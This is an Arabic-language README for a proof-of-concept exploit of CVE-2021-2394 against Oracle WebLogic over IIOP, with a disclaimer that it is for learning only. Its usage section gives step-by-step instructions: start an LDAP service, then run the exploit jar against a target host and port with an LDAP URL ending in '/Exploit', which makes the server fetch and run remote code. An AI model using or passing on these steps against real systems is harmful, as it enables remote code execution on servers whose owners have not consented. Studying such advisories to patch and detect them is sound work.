CVE-2021-2394
POC الخاص بـ CVE-2021-2394
- إخلاء مسؤولية
- هذا المشروع لأغراض التعلم فقط، وأي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن الفحص غير المصرح به تقع على عاتق المستخدم نفسه.
-
ملاحظات
- يستخدم POC إرسال الحزم عبر IIOP، يرجى إضافة التبعيات ذات الصلة (تم وضع تبعيات الإصدار 12.2.1.3.0 في الإصدار release)
- يرجى استخدام إصدار JDK منخفض عند تثبيت WebLogic لإجراء الاختبار
-
طريقة الاستخدام:
- قم بتشغيل خدمة LDAP
java -jar CVE_2021_2394.jar rhost rport ldapurl
- مثال:
java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
-
الروابط المرجعية: